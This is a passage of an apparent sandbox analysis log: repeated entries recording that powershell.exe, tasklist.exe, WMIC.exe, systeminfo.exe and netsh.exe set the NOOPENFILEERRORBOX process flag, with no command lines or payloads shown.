              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
